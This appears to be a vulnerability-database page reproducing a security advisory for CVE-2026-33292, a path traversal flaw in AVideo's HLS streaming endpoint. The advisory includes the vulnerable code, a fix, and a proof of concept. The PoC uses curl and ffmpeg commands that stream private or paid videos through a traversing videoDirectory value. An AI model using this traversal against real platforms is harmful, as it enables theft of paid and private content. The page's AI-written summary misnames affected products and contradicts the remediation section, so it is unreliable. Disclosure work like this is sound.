PHP
CVE-2026-33292
HIGH
Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
The HLS streaming endpoint (view/hls.php) is vulnerable to a path traversal attack that allows an unauthenticated attacker to stream any private or paid video on the platform. The videoDirectory GET parameter is used in two divergent code paths - one for authorization (which truncates at the first / segment) and one for file access (which preserves .. traversal sequences) - creating a split-oracle condition where authorization is checked against one video while content is served from another.
Details
The vulnerability is a split-oracle between the authorization lookup and the filesystem path construction. When hls.php receives a request, it processes $_GET['videoDirectory'] through two independent functions that interpret the input differently.
Step 1 - Authorization lookup truncates at first path segment (objects/video.php:1685-1688):
public static function getVideoFromFileName($fileName, $ignoreGroup = false, $ignoreTags = false)
{
// ...
$parts = explode("/", $fileName);
if (!empty($parts[0])) {
$fileName = $parts[0]; // Only takes first segment
}
$fileName = self::getCleanFilenameFromFile($fileName);
// ...
$sql = "SELECT id FROM videos WHERE filename = ? LIMIT 1";
$res = sqlDAL::readSql($sql, "s", [$fileName]);For input public_video/../private_video, explode("/", ...) yields ["public_video", "..", "private_video"] and only public_video is used for the DB query. The authorization check at hls.php:73 then runs against this public video:
if (isAVideoUserAgent() || ... || User::canWatchVideo($video['id']) || ...) {Step 2 - File path construction preserves the traversal (objects/video.php:4622-4638):
public static function getPathToFile($videoFilename, $createDir = false)
{
$videosDir = self::getStoragePath();
$videoFilename = str_replace($videosDir, '', $videoFilename);
$paths = Video::getPaths($videoFilename, $createDir);
if (preg_match('/index(_offline)?.(m3u8|mp4|mp3)$/', $videoFilename)) {
$paths['path'] = rtrim($paths['path'], DIRECTORY_SEPARATOR);
$paths['path'] = rtrim($paths['path'], '/');
$videoFilename = str_replace($paths['relative'], '', $videoFilename);
$videoFilename = str_replace($paths['filename'], '', $videoFilename);
}
$newPath = addLastSlash($paths['path']) . "{$videoFilename}";
$newPath = str_replace('//', '/', $newPath);
return $newPath;
}getPaths extracts the clean filename (e.g., public_video) to build the base path /videos/public_video/. Then str_replace($paths['filename'], '', $videoFilename) replaces only the clean name from the full input, leaving the traversal intact: /../private_video/index.m3u8. The concatenation at line 4634 produces /videos/public_video/../private_video/index.m3u8, which the OS resolves to /videos/private_video/index.m3u8.
No mitigations exist in the path:
fixPath()(objects/functionsFile.php:1116) only normalizes slashes, does not filter..- No
realpath()call anywhere in the chain - No
..filtering on thevideoDirectoryparameter - The traversal is in a query parameter, not the URL path, so web server path normalization does not apply
PoC
Prerequisites: An AVideo instance with at least one public video (filename: public_video) and one private/paid video (filename: private_video).
Step 1 - Confirm the private video is inaccessible directly:
curl -s "https://target.com/view/hls.php?videoDirectory=private_video" \
| head -5
# Expected: "HLS.php Can not see video [ID] (private_video) cannot watch (ID)"Step 2 - Exploit the split-oracle to stream the private video:
curl -s "https://target.com/view/hls.php?videoDirectory=public_video/../private_video" \
-H "Accept: application/vnd.apple.mpegurl"
# Expected: Valid M3U8 playlist containing private_video's HLS segmentsStep 3 - Stream the private video content using the returned playlist:
# The M3U8 response contains segment URLs; use ffmpeg or any HLS player:
ffmpeg -i "https://target.com/view/hls.php?videoDirectory=public_video/../private_video" \
-c copy stolen_video.mp4The authorization check passes because it resolves public_video (the public video), while the file system serves private_video's HLS stream.
Impact
- Any unauthenticated user can stream any private, unlisted, or paid video on the platform by knowing or guessing its filename directory.
- Paid content bypass: Monetized videos protected by pay-per-view or subscription gates can be streamed for free.
- Privacy violation: Videos marked as private or restricted to specific user groups are fully accessible.
- Content theft at scale: Video filenames follow predictable patterns (e.g.,
video_YYYYMMDD_XXXXX), enabling enumeration. An attacker only needs one publicly accessible video to pivot to any other video on the instance. - This affects all AVideo instances with at least one public video, which is the default configuration for any content platform.
Recommended Fix
Sanitize the videoDirectory parameter to reject path traversal sequences before any processing occurs. Apply this fix at the top of view/hls.php:
// view/hls.php - after line 16, before line 17
if (empty($_GET['videoDirectory'])) {
forbiddenPage("No directory set");
}
// ADD: Reject path traversal attempts
$_GET['videoDirectory'] = str_replace('\\', '/', $_GET['videoDirectory']);
if (preg_match('/\.\./', $_GET['videoDirectory'])) {
forbiddenPage("Invalid directory");
}
// Normalize: strip leading/trailing slashes, collapse multiples
$_GET['videoDirectory'] = trim($_GET['videoDirectory'], '/');
$_GET['videoDirectory'] = preg_replace('#/+#', '/', $_GET['videoDirectory']);Additionally, add a realpath() check in getPathToFile as defense-in-depth (objects/video.php:4636):
$newPath = str_replace('//', '/', $newPath);
// ADD: Verify resolved path stays within videos directory
$realPath = realpath($newPath);
$realVideosDir = realpath($videosDir);
if ($realPath === false || strpos($realPath, $realVideosDir) !== 0) {
return false;
}
return $newPath;AnalysisAI
Unauthenticated attackers can stream any private or paid video in PHP, Oracle, and Apple applications through a path traversal vulnerability in the HLS streaming endpoint. The flaw exploits a split-oracle condition where authorization validation and file access use different parsing logic on the videoDirectory parameter, allowing attackers to bypass authentication checks while accessing unauthorized content. No patch is currently available for this high-severity vulnerability.
Technical ContextAI
AVideo (identified by CPE pkg:composer/wwbn_avideo) is a video streaming platform that provides HLS (HTTP Live Streaming) functionality through its view/hls.php endpoint. The vulnerability is classified as CWE-22 (Path Traversal), where user-controlled input containing directory traversal sequences (../) is not properly sanitized before being used in file system operations. The root cause lies in divergent code paths: the authorization function getVideoFromFileName() truncates input at the first forward slash to extract only the first path segment for database lookup, while the file serving function getPathToFile() preserves the complete input including traversal sequences, creating a mismatch between what is authorized versus what is served.
RemediationAI
Apply the vendor-provided patches by updating AVideo to the latest version that includes the security fixes detailed in the advisory at https://github.com/WWBN/AVideo/security/advisories/GHSA-pw4v-x838-w5pg. The fix involves implementing input validation to reject path traversal sequences in the videoDirectory parameter and adding realpath() verification to ensure resolved paths remain within the intended videos directory. As an immediate workaround until patching is possible, consider implementing web application firewall rules to block requests containing '../' in the videoDirectory parameter, though this should not be considered a permanent solution.
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all
Same weakness CWE-22 – Path Traversal
View allSame technique Path Traversal
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-pw4v-x838-w5pg